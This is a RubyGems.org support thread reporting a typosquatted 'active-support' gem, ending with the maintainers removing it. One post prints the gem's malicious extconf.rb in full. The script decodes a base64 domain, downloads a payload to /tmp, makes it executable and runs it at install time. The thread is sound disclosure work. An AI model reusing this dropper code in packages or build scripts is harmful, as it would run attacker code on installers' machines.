tag:help.rubygems.org,2010-01-19:/discussions/problems/32656-reporting-abuse-on-active-supportRubyGems.org: Discussion 2018-08-09T13:10:57Ztag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T02:10:17Z2018-08-09T02:10:18ZReporting Abuse on active-support<div><p>This seems like a bogus gem.<br>
Use a very similar name as a very popular gem.<br>
Description seems off</p>
<p>Installation gives</p>
<p>This seems like a bogus gem.<br>
Use a very similar name as a very popular gem.<br>
Description seems off</p>
<p>Installation gives</p>
<p>Fetching gem metadata from <a href="https://rubygems.org/">https://rubygems.org/</a>.....<br>
Resolving dependencies...<br>
Fetching active-support 5.2.0<br>
Installing active-support 5.2.0 with native extensions<br>
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.</p>
<p>current directory:<br>
/redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0/ext/trellislike/unflaming/waffling /redacted/.rvm/rubies/ruby-2.4.4/bin/ruby -r ./siteconf20180809-44989-1mvw31o.rb extconf.rb extconf.rb:27:in <code>run': undefined method</code>install_exploit' for Smectis:Class (NoMethodError)<br>
Did you mean? install_explot<br>
from extconf.rb:31:in `'</p>
<p>extconf failed, exit code 1</p>
<p>Gem files will remain installed in /redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0 for<br>
inspection.<br>
Results logged to<br>
/redacted/.rvm/gems/ruby-2.4.4/extensions/x86_64-darwin-17/2.4.0/active-support-5.2.0/gem_make.out</p>
<p>An error occurred while installing active-support (5.2.0), and Bundler cannot continue.<br>
Make sure that <code>gem install active-support -v '5.2.0' --source 'https://rubygems.org/'</code> succeeds<br>
before bundling.</p>
<p>In Gemfile:<br>
active-support</p></div>Guilherme Ramostag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T02:15:12Z2018-08-09T02:15:13ZReporting Abuse on active-support<div><p>Further investigation shows definite malware behaviour.</p>
<p>The gem duplicate official activesupport (no hyphen) code but adds a compiled extension.</p>
<p>active-support-5.2.0.gem/data/ext/trellislike/unflaming/waffling/extconf.rb<br>
attempts to resolve a base64 encoded domain, download a payload and execute.</p>
<p>require 'net/http'<br>
require 'uri'<br>
require 'base64'<br>
require 'resolv'</p>
<p>class Smectis<br>
def self.install_explot(weighership) if !weighership.nil? and weighership != '0.0.0.0' educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming')) File.open('/tmp/autosymbiontic', 'wb+') do |uterometer| uterometer.binmode uterometer.write(educable.body) uterometer.chmod(0777) uterometer.close end system('/tmp/autosymbiontic') end end</p>
<p>def self.run() milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU=' jaunting = nil begin jaunting = Resolv.getaddress(Base64.decode64(milligram)) rescue end self.install_exploit(jaunting) end end</p>
<p>Smectis.run()</p></div>Sam Giffneytag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T12:15:46Z2018-08-09T12:15:48ZReporting Abuse on active-support<div><p>Probably the same thing with this gem from the same user: <a href="https://rubygems.org/gems/deamons">https://rubygems.org/gems/deamons</a></p></div>Patrick Figeltag:help.rubygems.org,2010-01-19:Comment/458664932018-08-09T13:10:56Z2018-08-09T13:10:56ZReporting Abuse on active-support<div><p>Thanks for the report. We have removed the gem.</p></div>David Radcliffe